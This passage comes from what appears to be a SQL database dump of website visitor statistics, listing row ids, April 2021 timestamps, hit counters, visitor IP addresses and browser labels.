3605,1619049175,1,0,1,0,'66.249.70.47',''),(553606,1619049490,1,1,0,0,'110.36.230.102','chrome'),(553607,1619049501,1,1,0,0,'186.251.162.137','other'),(553608,1619050159,1,1,0,0,'61.132.87.130','msie'),(553609,1619050575,1,1,0,0,'150.107.92.177','chrome'),(553610,1619050747,1,1,0,0,'103.234.68.98','other'),(553611,1619050794,1,1,0,0,'112.220.20.170','msie'),(553612,1619050881,1,1,0,0,'220.76.251.168','chrome'),(553613,1619050973,1,1,0,0,'171.8.196.129','chrome'),(553614,1619051053,1,1,0,0,'66.249.70.51','chrome'),(553615,1619051171,1,1,0,0,'58.222.106.106','msie'),(553616,1619051993,1,1,0,0,'58.216.218.236','chrome'),(553617,1619052022,1,1,0,0,'66.60.68.66','chrome'),(553618,1619052161,1,1,0,0,'112.220.22.106','chrome'),(553619,1619053035,1,1,0,0,'171.35.163.216','chrome'),(553620,1619055503,1,1,0,0,'14.0.136.128','chrome'),(553621,1619055996,1,1,0,0,'82.62.1.40','chrome'),(553622,1619056142,1,1,0,0,'115.12.177.66','other'),(553623,1619056683,1,1,0,0,'171.35.171.193','msie'),(553624,1619056700,1,1,0,0,'171.231.238.205','other'),(553625,1619057415,1,1,0,0,'59.103.139.245','chrome'),(553626,1619057433,1,1,0,0,'159.224.172.66','chrome'),(553627,1619057456,1,1,0,0,'36.34.85.4','chrome'),(553628,1619057650,1,1,0,0,'116.48.138.123','msie'),(553629,1619058208,1,1,0,0,'190.186.58.162','other'),(553630,1619058283,1,1,0,0,'219.139.131.21','chrome'),(553631,1619058411,1,1,0,0,'60.174.118.123','other'),(553632,1619058981,1,1,0,0,'122.228.165.38','other'),(553633,1619059563,1,1,0,0,'59.40.82.224','msie'),(553634,1619059576,1,1,0,0,'60.30.162.38','chrome'),(553635,1619060586,1,1,0,0,'110.39.191.206','chrome'),(553636,1619060916,1,1,0,0,'36.35.64.81','other'),(553637,1619061091,1,1,0,0,'61.191.113.134','other'),(553638,1619062104,1,1,0,0,'122.187.224.227','msie'),(553639,1619062443,1,1,0,0,'37.79.244.174','chrome'),(553640,1619062445,1,1,0,0,'37.79.244.170','chrome'),(553641,1619062446,1,1,0,0,'37.79.244.172','chrome'),(553642,1619062862,1,1,0,0,'171.224.44.170','other'),(553643,1619062883,1,1,0,0,'112.216.176.106','other'),(553644,1619062940,1,1,0,0,'176.51.56.218','other'),(553645,1619063797,1,1,0,0,'113.140.85.166','msie'),(553646,1619064135,1,1,0,0,'60.28.136.42','msie'),(553647,1619064454,1,1,0,0,'123.21.77.161','msie'),(553648,1619064624,1,1,0,0,'112.217.226.146','other'),(553649,1619064993,1,1,0,0,'14.186.35.78','chrome'),(553650,1619064995,1,1,0,0,'14.186.61.87','chrome'),(553651,1619065430,1,1,0,0,'1.214.47.130','other'),(553652,1619065696,1,1,0,0,'58.42.244.200','other'),(553653,1619066901,1,1,0,0,'202.55.93.182','msie'),(553655,1619067054,1,1,0,0,'62.33.98.53','other'),(553656,1619067242,1,1,0,0,'109.197.248.233','msie'),(553657,1619067810,1,1,0,0,'178.234.34.179','msie'),(553658,1619068221,1,1,0,0,'87.26.218.107','firefox'),(553659,1619069172,1,1,0,0,'173.252.79.117','other'),(553660,1619069174,1,1,0,0,'31.13.127.25','chrome'),(553661,1619069186,1,1,0,0,'31.13.127.26','chrome'),(553662,1619069187,1,1,0,0,'31.13.127.3','chrome'),(553663,1619069223,1,1,0,0,'221.210.80.136','other'),(553664,1619069562,1,1,0,0,'42.114.246.121','other'),(553665,1619069743,1,1,0,0,'173.252.111.22','other'),(553666,1619069934,1,1,0,0,'113.195.165.43','chrome'),(553667,1619069952,1,1,0,0,'69.50.64.32','chrome'),(553668,1619070195,1,1,0,0,'110.36.227.194','other'),(553669,1619070909,1,1,0,0,'60.172.230.184','chrome'),(553670,1619071843,1,1,0,0,'61.244.114.180','chrome'),(553671,1619072621,1,1,0,0,'58.102.100.126','other'),(553672,1619072650,1,1,0,0,'218.2.28.94','chrome'),(553673,1619072655,1,1,0,0,'153.35.192.98','other'),(553674,1619073155,1,1,0,0,'139.194.249.102','chrome'),(553675,1619073449,1,1,0,0,'213.154.2.42','chrome'),(553676,1619074031,1,1,0,0,'80.210.32.67','other'),(553677,1619074083,1,1,0,0,'210.5.156.90','msie'),(553678,1619074094,1,1,0,0,'203.232.110.106','other'),(553679,1619074194,1,1,0,0,'69.171.249.1','other'),(553680,1619074252,1,1,0,0,'60.174.118.80','other'),(553681,1619074394,1,1,0,0,'14.186.35.78','other'),(553682,1619074619,1,1,0,0,'46.150.77.132','chrome'),(553683,1619075074,1,1,0,0,'121.145.120.3','chrome'),(553684,1619075236,1,1,0,0,'121.145.120.3','other'),(553685,1619075427,1,1,0,0,'178.44.218.163','chrome'),(553686,1619075430,1,1,0,0,'125.99.118.227','chrome'),(553687,1619076439,1,1,0,0,'219.70.183.208','chrome'),(553688,1619076503,1,1,0,0,'59.62.108.68','firefox'),(553689,1619076894,1,1,0,0,'186.226.174.241','other'),(553690,1619077557,1,1,0,0,'218.22.234.147','chrome'),(553691,1619077795,1,1,0,0,'66.249.70.47','chrome'),(553692,1619077840,1,1,0,0,'61.240.232.108','other'),(553693,1619078316,1,1,0,0,'59.145.146.166','other'),(553694,1619078549,1,0,1,0,'66.249.70.49',''),(553695,1619078750,1,1,0,0,'113.194.130.218','chrome'),(553696,1619078757,1,1,0,0,'58.211.169.50','chrome'),(553697,1619079289,1,1,0,0,'211.72.89.101','other'),(553698,1619079854,1,1,0,0,'218.93.14.42','chrome'),(553699,1619079865,1,1,0,0,'121.142.165.111','msie'),(553700,1619079930,1,1,0,0,'222.185.243.130','chrome'),(553701,1619080319,1,1,0,0,'185.237.217.11','chrome'),(553702,1619080789,1,1,0,0,'170.250.150.10','other'),(553703,1619080868,1,1,0,0,'186.96.103.11','other'),(553704,1619080883,1,1,0,0,'1.214.47.130','other'),(553705,1619082251,1,1,0,0,'60.173.132.42','other'),(553706,1619082315,1,1,0,0,'60.8.213.170','other'),(553707,1619082666,1,1,0,0,'186.239.150.70','chrome'),(553708,1619083423,1,1,0,0,'118.189.203.65','chrome'),(553709,1619083454,1,1,0,0,'218.29.165.154','chrome'),(553710,1619083599,1,0,1,0,'66.249.70.47',''),(553711,1619083743,1,1,0,0,'36.7.108.60','msie'),(553712,1619083773,1,0,1,0,'66.249.70.49',''),(553713,1619084206,1,1,0,0,'185.108.213.143','other'),(553714,1619084696,1,1,0,0,'122.174.205.89','other'),(553715,1619084698,1,1,0,0,'115.99.14.121','other'),(553716,1619085283,1,1,0,0,'59.45.25.138','other'),(553717,1619086166,1,1,0,0,'218.76.33.134','msie'),(553718,1619086444,1,1,0,0,'103.205.179.249','msie'),(553719,1619086560,1,1,0,0,'122.187.97.130','chrome'),(553720,1619087502,1,1,0,0,'114.219.160.6','msie'),(553721,1619087509,1,1,0,0,'122.187.225.19','msie'),(553722,1619087646,1,1,0,0,'81.161.142.153','chrome'),(553723,1619088300,1,1,0,0,'103.233.204.110','other'),(553724,1619088823,1,1,0,0,'186.239.150.70','other'),(553725,1619088864,1,1,0,0,'58.221.156.67','chrome'),(553726,1619089018,1,1,0,0,'218.93.21.43','other'),(553727,1619089077,1,1,0,0,'66.249.70.49','chrome'),(553728,1619089604,1,1,0,0,'66.249.70.47','chrome'),(553729,1619090603,1,1,0,0,'208.111.125.170','chrome'),(553730,1619090613,1,0,1,0,'66.249.70.49',''),(553731,1619090768,1,1,0,0,'211.55.33.251','chrome'),(553732,1619091901,1,1,0,0,'60.221.215.232','chrome'),(553733,1619092820,1,1,0,0,'62.106.106.36','firefox'),(553734,1619092997,1,1,0,0,'47.243.107.147','chrome'),(553735,1619093010,1,1,0,0,'47.243.107.147','other'),(553736,1619093093,1,1,0,0,'47.243.105.64','chrome'),(553737,1619093097,1,1,0,0,'47.243.105.64','other'),(553738,1619093848,1,1,0,0,'58.82.143.114','chrome'),(553739,1619094004,1,1,0,0,'195.133.143.4','chrome'),(553740,1619094868,1,1,0,0,'113.140.84.86','msie'),(553741,1619094998,1,1,0,0,'110.38.168.2','firefox'),(553742,1619095617,1,1,0,0,'110.39.191.178','msie'),(553743,1619095624,1,1,0,0,'221.210.80.134','msie'),(553744,1619095868,1,1,0,0,'36.7.108.60','other'),(553745,1619096034,1,1,0,0,'66.249.70.49','chrome'),(553746,1619096121,1,1,0,0,'218.146.86.246','firefox'),(553747,1619096399,1,1,0,0,'222.185.243.130','chrome'),(553748,1619096429,1,1,0,0,'138.97.92.134','other'),(553749,1619096649,1,1,0,0,'79.132.116.198','chrome'),(553750,1619097423,1,0,1,0,'66.249.70.47',''),(553751,1619098270,1,1,0,0,'203.242.141.91','chrome'),(553752,1619098379,1,1,0,0,'59.46.193.187','msie'),(553753,1619099427,1,1,0,0,'121.191.1.156','msie'),(553754,1619100357,1,1,0,0,'110.39.194.218','msie'),(553755,1619100946,1,1,0,0,'122.187.224.251','chrome'),(553756,1619101214,1,1,0,0,'61.160.9.18','other'),(553757,1619101249,1,1,0,0,'200.159.48.45','chrome'),(553758,1619101257,1,1,0,0,'186.239.155.106','chrome'),(553759,1619101590,1,1,0,0,'189.204.157.139','msie'),(553760,1619102413,1,1,0,0,'186.239.150.70','msie'),(553761,1619102587,1,1,0,0,'60.174.90.6','other'),(553762,1619102760,1,1,0,0,'103.234.68.98','msie'),(553763,1619103618,1,1,0,0,'110.36.233.94','chrome'),(553764,1619104034,1,1,0,0,'203.205.54.55','chrome'),(553765,1619104128,1,1,0,0,'110.36.227.194','msie'),(553766,1619105027,1,1,0,0,'187.216.254.50','other'),(553767,1619105374,1,1,0,0,'210.245.12.98','chrome'),(553768,1619105815,1,1,0,0,'212.203.55.32','other'),(553769,1619105856,1,1,0,0,'112.220.20.170','other'),(553770,1619105975,1,1,0,0,'58.214.8.10','msie'),(553771,1619105979,1,1,0,0,'110.36.218.70','msie'),(553772,1619106310,1,1,0,0,'60.171.76.224','firefox'),(553773,1619106421,1,1,0,0,'82.166.30.33','other'),(553774,1619106707,1,1,0,0,'14.231.162.159','other'),(553775,1619107684,1,1,0,0,'200.159.113.3','other'),(553776,1619108189,1,1,0,0,'171.35.171.193','chrome'),(553777,1619108868,1,1,0,0,'14.186.61.87','other'),(553778,1619108872,1,1,0,0,'14.186.37.109','other'),(553779,1619109420,1,1,0,0,'121.15.212.65','msie'),(553780,1619110065,1,1,0,0,'182.106.216.4','other'),(553781,1619110283,1,1,0,0,'113.190.156.109','msie'),(553782,1619110393,1,1,0,0,'171.103.195.250','msie'),(553783,1619110413,1,1,0,0,'60.172.23.155','msie'),(553784,1619110663,1,1,0,0,'66.249.70.47','chrome'),(553785,1619110689,1,1,0,0,'218.87.160.249','other'),(553786,1619110844,1,1,0,0,'220.178.246.43','msie'),(553787,1619111052,1,1,0,0,'113.190.209.103','chrome'),(553788,1619111057,1,1,0,0,'121.147.94.185','other'),(553789,1619111106,1,1,0,0,'14.232.169.101','chrome'),(553790,1619111130,1,1,0,0,'58.16.114.117','chrome'),(553791,1619111353,1,1,0,0,'110.38.168.110','chrome'),(553792,1619112893,1,1,0,0,'47.243.101.88','chrome'),(553793,1619112899,1,1,0,0,'47.243.101.88','other'),(553794,1619112974,1,1,0,0,'118.32.230.127','other'),(553795,1619112996,1,1,0,0,'222.189.163.82','other'),(553796,1619113250,1,1,0,0,'47.242.244.190','chrome'),(553797,1619113254,1,1,0,0,'47.242.244.190','other'),(553798,1619113769,1,1,0,0,'31.148.205.179','chrome'),(553799,1619114204,1,1,0,0,'121.147.94.185','chrome'),(553800,1619114509,1,1,0,0,'94.153.22.95','chrome'),(553801,1619115656,1,1,0,0,'221.229.247.179','msie'),(553802,1619115692,1,1,0,0,'119.135.176.148','chrome'),(553803,1619115798,1,1,0,0,'113.172.234.190','firefox'),(553804,1619115814,1,1,0,0,'62.106.106.36','other'),(553805,1619116840,1,1,0,0,'110.39.190.6','chrome'),(553806,1619117293,1,1,0,0,'60.190.37.155','msie'),(553807,1619117458,1,1,0,0,'66.249.70.49','chrome'),(553808,1619117807,1,1,0,0,'66.249.70.47','chrome'),(553809,1619118245,1,1,0,0,'110.38.168.110','chrome'),(553810,1619118317,2,2,0,0,'66.249.70.51','chrome'),(553811,1619118643,1,1,0,0,'220.180.107.235','chrome'),(553812,1619118855,1,1,0,0,'220.179.255.54','chrome'),(553813,1619118980,1,1,0,0,'77.75.6.34','other'),(553814,1619119059,1,1,0,0,'158.140.146.162','other'),(553815,1619119483,1,1,0,0,'170.250.150.10','chrome'),(553816,1619119505,1,1,0,0,'218.92.97.182','chrome'),(553817,1619119575,1,1,0,0,'221.229.247.179','msie'),(553818,1619119579,1,1,0,0,'183.102.3.191','msie'),(553819,1619119583,1,1,0,0,'180.167.111.38','chrome'),(553820,1619119871,1,1,0,0,'210.222.54.244','other'),(553821,1619119892,1,1,0,0,'221.224.114.229','msie'),(553822,1619119902,1,1,0,0,'175.20.241.2','other'),(553823,1619120208,1,1,0,0,'113.172.142.214','chrome'),(553824,1619120214,2,2,0,0,'221.12.137.6','chrome'),(553825,1619120636,1,1,0,0,'175.101.251.94','chrome'),(553826,1619120658,1,1,0,0,'121.147.94.185','chrome'),(553827,1619120848,2,0,2,0,'66.249.70.47',''),(553828,1619121612,1,1,0,0,'77.253.233.17','chrome'),(553829,1619121882,1,1,0,0,'115.79.46.38','other'),(553830,1619122039,1,1,0,0,'139.214.92.142','firefox'),(553831,1619124162,1,1,0,0,'183.62.15.170','chrome'),(553832,1619124180,1,1,0,0,'94.242.144.180','chrome'),(553833,1619127001,1,1,0,0,'103.82.66.42','other'),(553834,1619127204,1,1,0,0,'202.175.173.66','other'),(553835,1619127439,1,1,0,0,'211.230.4.154','chrome'),(553836,1619127720,1,1,0,0,'208.110.85.68','chrome'),(553837,1619129125,1,1,0,0,'186.226.14.145','other'),(553838,1619129248,1,1,0,0,'46.150.77.132','other'),(553839,1619129720,1,1,0,0,'60.6.223.191','chrome'),(553840,1619129744,1,1,0,0,'59.40.80.230','chrome'),(553841,1619131452,1,1,0,0,'222.185.243.130','chrome'),(553842,1619132097,1,1,0,0,'58.215.217.98','other'),(553843,1619132505,1,1,0,0,'178.19.106.178','chrome'),(553844,1619132558,1,1,0,0,'221.238.40.98','chrome'),(553845,1619132580,1,1,0,0,'177.154.49.187','chrome'),(553846,1619133108,1,1,0,0,'222.160.142.218','other'),(553847,1619133625,1,1,0,0,'121.28.181.154','other'),(553848,1619133887,1,1,0,0,'58.102.100.126','chrome'),(553849,1619134433,1,1,0,0,'110.36.233.94','other'),(553850,1619134451,1,1,0,0,'110.36.208.34','other'),(553851,1619135387,1,0,1,0,'66.249.70.47',''),(553852,1619135410,1,1,0,0,'122.228.165.38','other'),(553853,1619135456,1,1,0,0,'116.113.28.190','other'),(553854,1619135683,3,1,2,0,'66.249.70.47',''),(553855,1619135713,2,0,2,0,'66.249.70.49',''),(553856,1619135714,2,0,2,0,'66.249.70.51',''),(553857,1619135804,1,1,0,0,'203.205.54.55','other'),(553858,1619137221,1,1,0,0,'110.36.219.242','chrome'),(553859,1619137256,1,1,0,0,'66.249.70.51','chrome'),(553860,1619137708,1,1,0,0,'125.99.118.227','chrome'),(553861,1619137750,1,1,0,0,'218.87.160.249','other'),(553862,1619138516,1,1,0,0,'218.93.53.118','chrome'),(553863,1619138533,1,1,0,0,'31.13.127.9','other'),(553864,1619138569,1,1,0,0,'96.75.195.171','chrome'),(553865,1619139663,1,1,0,0,'60.175.99.192','chrome'),(553866,1619141020,1,1,0,0,'5.255.253.92','chrome'),(553867,1619141106,18,18,0,0,'5.255.253.87','other'),(553868,1619141107,33,33,0,0,'5.255.253.92','other'),(553869,1619141385,1,1,0,0,'5.45.207.150','other'),(553870,1619142125,1,1,0,0,'60.208.82.139','chrome'),(553871,1619142242,1,1,0,0,'171.240.67.179','other'),(553872,1619142268,1,1,0,0,'110.36.221.182','other'),(553873,1619142301,1,1,0,0,'218.93.21.118','chrome'),(553874,1619142324,1,1,0,0,'58.16.188.59','other'),(553875,1619142401,1,1,0,0,'112.120.80.226','msie'),(553876,1619142434,1,1,0,0,'202.107.34.250','msie'),(553877,1619142717,1,1,0,0,'112.120.82.77','other'),(553878,1619142870,1,1,0,0,'103.251.221.222','chrome'),(553879,1619142871,1,1,0,0,'218.76.33.134','msie'),(553880,1619142957,1,1,0,0,'158.140.137.186','other'),(553881,1619143058,1,1,0,0,'211.115.213.199','chrome'),(553882,1619143714,1,1,0,0,'66.249.70.47','chrome'),(553883,1619143953,1,1,0,0,'125.99.118.227','chrome'),(553884,1619144126,1,1,0,0,'91.233.44.52','chrome'),(553885,1619144344,1,1,0,0,'185.216.252.239','chrome'),(553886,1619144534,1,1,0,0,'200.232.114.219','other'),(553887,1619144553,1,1,0,0,'60.171.3.42','other'),(553888,1619145082,1,1,0,0,'12.139.116.50','msie'),(553889,1619145521,1,1,0,0,'157.122.183.219','other'),(553890,1619146266,1,1,0,0,'36.33.160.91','msie'),(553891,1619147691,1,1,0,0,'218.93.14.134','other'),(553892,1619148082,1,1,0,0,'115.12.177.66','chrome'),(553893,1619149161,1,1,0,0,'183.80.199.150','chrome'),(553894,1619150352,1,1,0,0,'110.36.223.142','msie'),(553895,1619150863,1,1,0,0,'203.242.141.91','chrome'),(553896,1619151163,1,1,0,0,'5.255.253.92','chrome'),(553897,1619152482,1,0,1,0,'66.249.70.49',''),(553898,1619153531,4,0,4,0,'66.249.70.49',''),(553899,1619153595,1,1,0,0,'46.211.13.64','chrome'),(553900,1619153621,7,0,7,0,'66.249.70.47',''),(553901,1619153771,1,0,1,0,'66.249.70.51',''),(553902,1619154307,1,1,0,0,'196.40.0.120','chrome'),(553903,1619154342,1,1,0,0,'219.139.131.21','chrome'),(553904,1619155076,1,1,0,0,'173.252.79.11','other'),(553905,1619155293,1,1,0,0,'219.237.78.2','chrome'),(553906,1619155455,1,1,0,0,'58.214.39.178','other'),(553907,1619155461,1,1,0,0,'66.249.70.47','chrome'),(553908,1619155505,1,1,0,0,'66.249.70.51','chrome'),(553909,1619155588,1,1,0,0,'66.249.70.49','chrome'),(553910,1619155794,1,1,0,0,'218.146.86.246','msie'),(553911,1619156301,1,1,0,0,'218.61.46.168','other'),(553912,1619156667,1,1,0,0,'179.60.215.206','other'),(553913,1619156905,1,1,0,0,'121.134.227.185','other'),(553914,1619157451,1,1,0,0,'113.172.109.207','other'),(553915,1619157661,1,1,0,0,'66.249.70.49','chrome'),(553916,1619157980,1,1,0,0,'182.137.14.72','other'),(553917,1619158637,1,1,0,0,'114.32.27.86','msie'),(553918,1619158997,1,1,0,0,'89.107.120.155','chrome'),(553919,1619159289,1,0,1,0,'66.249.70.47',''),(553920,1619159292,1,1,0,0,'42.236.10.114','chrome'),(553921,1619159431,1,1,0,0,'66.249.70.47','chrome'),(553922,1619159518,1,1,0,0,'42.236.10.93','chrome'),(553923,1619159599,1,1,0,0,'66.249.70.51','chrome'),(553924,1619160463,1,0,1,0,'66.249.70.47',''),(553925,1619160612,1,1,0,0,'122.225.112.22','other'),(553926,1619160616,1,1,0,0,'210.5.156.90','other'),(553927,1619160748,1,1,0,0,'58.243.104.86','chrome'),(553928,1619160864,1,1,0,0,'183.64.169.153','other'),(553929,1619160884,1,1,0,0,'110.38.213.138','other'),(553930,1619161043,1,1,0,0,'118.254.9.180','other'),(553931,1619161687,1,1,0,0,'128.199.163.117','chrome'),(553932,1619161934,1,1,0,0,'110.36.218.254','msie'),(553933,1619162523,1,1,0,0,'94.241.229.4','other'),(553934,1619162779,1,1,0,0,'110.78.148.24','chrome'),(553935,1619163301,1,1,0,0,'123.16.223.202','msie'),(553936,1619163481,1,1,0,0,'158.140.146.162','other'),(553937,1619163552,1,1,0,0,'91.237.200.131','other'),(553938,1619164718,1,1,0,0,'12.139.116.50','msie'),(553939,1619165287,1,1,0,0,'186.226.172.223','other'),(553940,1619166627,5,5,0,0,'54.176.188.51','chrome'),(553941,1619167057,1,1,0,0,'113.172.165.11','other'),(553942,1619168135,1,1,0,0,'103.81.24.8','chrome'),(553943,1619168648,1,1,0,0,'59.99.198.117','msie'),(553944,1619168827,1,1,0,0,'110.39.196.222','chrome'),(553945,1619169757,1,1,0,0,'220.127.98.158','msie'),(553946,1619169769,1,1,0,0,'110.38.3.146','msie'),(553947,1619170002,1,1,0,0,'61.7.141.30','chrome'),(553948,1619170023,1,1,0,0,'60.30.162.38','other'),(553949,1619170529,1,1,0,0,'61.97.140.19','other'),(553950,1619170810,1,1,0,0,'14.244.165.165','other'),(553951,1619170842,1,1,0,0,'110.39.184.190','other'),(553952,1619171171,1,1,0,0,'78.186.186.149','chrome'),(553953,1619171832,1,1,0,0,'218.76.33.134','other'),(553954,1619172020,1,1,0,0,'60.242.189.59','chrome'),(553955,1619172140,1,1,0,0,'222.189.163.82','other'),(553956,1619172782,1,1,0,0,'1.4.237.213','other'),(553957,1619172809,1,1,0,0,'129.205.6.110','other'),(553958,1619175928,1,1,0,0,'198.36.28.88','other'),(553959,1619176204,1,1,0,0,'139.194.168.68','other'),(553960,1619176258,1,1,0,0,'164.77.141.36','other'),(553961,1619176560,1,1,0,0,'222.189.163.82','msie'),(553962,1619176955,1,1,0,0,'66.249.70.47','chrome'),(553963,1619177322,1,1,0,0,'171.228.84.12','chrome'),(553964,1619177357,1,1,0,0,'60.173.132.42','chrome'),(553965,1619178144,1,1,0,0,'62.106.106.36','other'),(553966,1619179485,1,1,0,0,'218.76.215.70','other'),(553967,1619179913,1,1,0,0,'66.249.70.51','chrome'),(553968,1619179993,1,1,0,0,'222.185.243.130','chrome'),(553969,1619180029,1,1,0,0,'223.197.143.214','chrome'),(553970,1619180091,1,1,0,0,'110.39.184.110','chrome'),(553971,1619180142,1,1,0,0,'177.154.49.187','chrome'),(553972,1619180278,1,1,0,0,'60.171.135.254','other'),(553973,1619181245,1,1,0,0,'66.249.70.47','chrome'),(553974,1619181474,1,1,0,0,'123.163.127.249','msie'),(553975,1619182015,1,1,0,0,'66.249.70.51','chrome'),(553976,1619182273,1,1,0,0,'66.249.70.49','chrome'),(553977,1619182995,1,1,0,0,'202.93.113.3','other'),(553978,1619183180,2,1,1,0,'66.249.70.47',''),(553979,1619183192,1,1,0,0,'43.239.52.173','chrome'),(553980,1619183411,1,1,0,0,'114.38.57.8','other'),(553981,1619183440,1,0,1,0,'66.249.70.49',''),(553982,1619183555,1,1,0,0,'77.245.223.184','chrome'),(553983,1619183558,2,1,1,0,'66.249.70.51',''),(553985,1619183571,2,2,0,0,'66.249.70.49','chrome'),(553986,1619183577,1,1,0,0,'103.82.66.82','chrome'),(553987,1619183821,1,1,0,0,'66.249.70.51','chrome'),(553988,1619184365,1,1,0,0,'180.167.111.38','chrome'),(553989,1619184542,1,1,0,0,'58.102.100.126','msie'),(553990,1619185021,1,1,0,0,'110.38.2.174','msie'),(553991,1619185022,1,1,0,0,'123.17.155.217','msie'),(553992,1619185038,1,1,0,0,'41.90.114.175','other'),(553993,1619185387,1,1,0,0,'60.242.189.59','msie'),(553994,1619185452,1,1,0,0,'66.249.70.49','chrome'),(553995,1619185516,1,1,0,0,'171.228.208.232','other'),(553996,1619185537,1,1,0,0,'171.103.195.14','other'),(553997,1619186150,1,1,0,0,'202.175.173.66','chrome'),(553998,1619186527,1,1,0,0,'179.104.255.144','other'),(553999,1619186702,1,1,0,0,'66.249.70.47','chrome'),(554000,1619186705,1,1,0,0,'171.103.197.122','msie'),(554001,1619187317,1,1,0,0,'113.173.173.247','firefox'),(554002,1619187402,1,1,0,0,'110.39.184.110','other'),(554003,1619187456,1,1,0,0,'31.40.171.207','msie'),(554004,1619187604,1,1,0,0,'66.249.70.47','chrome'),(554005,1619188074,1,1,0,0,'223.197.134.182','chrome'),(554006,1619188259,1,1,0,0,'58.210.134.186','chrome'),(554007,1619188270,1,1,0,0,'120.197.62.18','chrome'),(554008,1619188275,1,1,0,0,'182.29.29.22','chrome'),(554009,1619188386,1,1,0,0,'113.194.136.177','other'),(554010,1619188516,1,1,0,0,'178.176.41.40','msie'),(554011,1619189148,2,2,0,0,'66.249.70.51','chrome'),(554012,1619189378,1,1,0,0,'103.234.68.98','other'),(554013,1619189425,1,1,0,0,'66.249.70.49','chrome'),(554014,1619189445,1,1,0,0,'36.99.136.133','chrome'),(554015,1619189455,1,1,0,0,'36.99.136.132','chrome'),(554016,1619191308,2,2,0,0,'66.249.70.47','chrome'),(554017,1619192094,1,1,0,0,'66.249.70.49','chrome'),(554018,1619192172,1,1,0,0,'200.159.48.45','other'),(554019,1619192617,1,1,0,0,'91.126.200.47','other'),(554020,1619192779,1,1,0,0,'112.120.82.77','msie'),(554021,1619192963,1,1,0,0,'66.249.70.51','chrome'),(554022,1619194177,3,3,0,0,'66.249.70.47','chrome'),(554023,1619194634,1,1,0,0,'113.194.136.177','chrome'),(554024,1619194647,1,1,0,0,'212.203.55.32','chrome'),(554025,1619195100,1,1,0,0,'14.162.163.72','other'),(554026,1619196387,1,1,0,0,'200.205.134.107','chrome'),(554027,1619197143,1,1,0,0,'94.28.231.183','msie'),(554028,1619198052,1,1,0,0,'110.38.168.2','chrome'),(554029,1619199178,1,1,0,0,'103.209.178.107','chrome'),(554030,1619199347,1,1,0,0,'27.115.240.120','other'),(554031,1619199851,1,1,0,0,'112.120.113.118','other'),(554032,1619200690,1,1,0,0,'87.197.121.58','msie'),(554033,1619200831,1,1,0,0,'218.93.11.178','other'),(554034,1619201499,1,1,0,0,'66.249.70.49','chrome'),(554035,1619202386,1,0,1,0,'66.249.70.47',''),(554036,1619202573,1,1,0,0,'66.249.70.47','chrome'),(554037,1619203793,2,2,0,0,'110.39.188.38','chrome'),(554038,1619204172,2,2,0,0,'66.249.70.47','chrome'),(554039,1619204226,2,2,0,0,'66.249.70.49','chrome'),(554040,1619204683,1,1,0,0,'118.166.106.48','msie'),(554041,1619205059,1,1,0,0,'62.106.106.36','other'),(554042,1619205380,1,1,0,0,'118.254.9.180','chrome'),(554043,1619205411,1,1,0,0,'175.20.241.2','chrome'),(554044,1619205430,1,1,0,0,'59.22.41.237','chrome'),(554045,1619205630,1,1,0,0,'66.249.70.49','chrome'),(554046,1619207195,1,1,0,0,'111.251.4.56','msie'),(554047,1619207203,1,1,0,0,'113.195.168.43','msie'),(554048,1619207241,1,1,0,0,'66.249.70.47','chrome'),(554049,1619207314,1,1,0,0,'218.93.11.178','other'),(554050,1619207687,1,1,0,0,'14.248.143.21','other'),(554051,1619207708,1,1,0,0,'154.117.133.142','other'),(554052,1619207737,2,1,1,0,'66.249.70.51',''),(554053,1619208836,1,1,0,0,'14.232.33.115','msie'),(554054,1619210292,1,1,0,0,'200.205.134.87','other'),(554055,1619210310,1,1,0,0,'178.163.97.16','other'),(554056,1619210373,1,1,0,0,'60.172.230.184','chrome'),(554057,1619210606,1,1,0,0,'186.56.77.190','chrome'),(554058,1619210718,1,1,0,0,'58.210.134.186','other'),(554059,1619210833,1,1,0,0,'66.249.70.49','chrome'),(554060,1619211079,1,1,0,0,'81.24.95.114','other'),(554061,1619211212,1,1,0,0,'175.20.241.2','msie'),(554062,1619211734,1,1,0,0,'218.76.33.134','chrome'),(554063,1619212354,1,1,0,0,'200.58.92.196','other'),(554064,1619212735,1,1,0,0,'14.171.150.94','chrome'),(554065,1619212792,1,1,0,0,'2.62.8.171','msie'),(554066,1619212818,1,1,0,0,'222.75.179.106','other'),(554067,1619213289,2,0,2,0,'66.249.70.51',''),(554068,1619213296,2,1,1,0,'66.249.70.49',''),(554069,1619213694,1,1,0,0,'66.249.70.49','chrome'),(554070,1619214426,1,1,0,0,'110.36.209.54','other'),(554071,1619214443,2,2,0,0,'66.249.70.47','chrome'),(554072,1619214739,2,2,0,0,'36.99.136.141','chrome'),(554073,1619214745,3,3,0,0,'36.99.136.143','chrome'),(554074,1619214769,3,3,0,0,'36.99.136.130','chrome'),(554075,1619214770,1,1,0,0,'36.99.136.139','chrome'),(554076,1619214771,2,2,0,0,'36.99.136.133','chrome'),(554079,1619214772,1,1,0,0,'36.99.136.135','chrome'),(554080,1619214773,1,1,0,0,'36.99.136.134','chrome'),(554081,1619214775,1,1,0,0,'36.99.136.132','chrome'),(554082,1619215046,1,1,0,0,'14.181.43.147','other'),(554083,1619215208,1,1,0,0,'176.31.174.3','chrome'),(554084,1619215919,1,1,0,0,'59.22.41.237','msie'),(554085,1619216160,1,1,0,0,'14.226.250.161','chrome'),(554086,1619216182,1,1,0,0,'121.30.252.106','chrome'),(554087,1619216258,1,1,0,0,'125.99.118.227','msie'),(554088,1619216609,1,1,0,0,'121.5.145.96','chrome'),(554089,1619217102,1,1,0,0,'223.197.226.51','msie'),(554090,1619217235,1,1,0,0,'113.172.208.18','chrome'),(554091,1619217815,1,1,0,0,'49.75.133.157','other'),(554092,1619222762,1,1,0,0,'110.39.191.178','other'),(554093,1619222782,1,1,0,0,'62.106.120.254','other'),(554094,1619223420,1,1,0,0,'153.0.163.95','msie'),(554095,1619223867,1,1,0,0,'62.106.120.254','msie'),(554096,1619223874,1,1,0,0,'211.104.172.54','msie'),(554097,1619224605,1,1,0,0,'171.35.173.186','chrome'),(554098,1619225366,1,1,0,0,'14.177.183.42','chrome'),(554099,1619225415,1,1,0,0,'112.51.7.35','other'),(554100,1619225655,1,1,0,0,'61.160.121.146','other'),(554101,1619226199,1,1,0,0,'219.141.207.183','other'),(554102,1619226526,1,1,0,0,'154.0.132.19','other'),(554103,1619226652,1,1,0,0,'14.169.144.189','chrome'),(554104,1619226789,1,1,0,0,'118.189.203.65','other'),(554105,1619226859,1,1,0,0,'14.227.51.110','other'),(554106,1619227328,1,1,0,0,'201.28.105.213','other'),(554107,1619227364,1,1,0,0,'178.219.124.104','other'),(554108,1619228185,1,1,0,0,'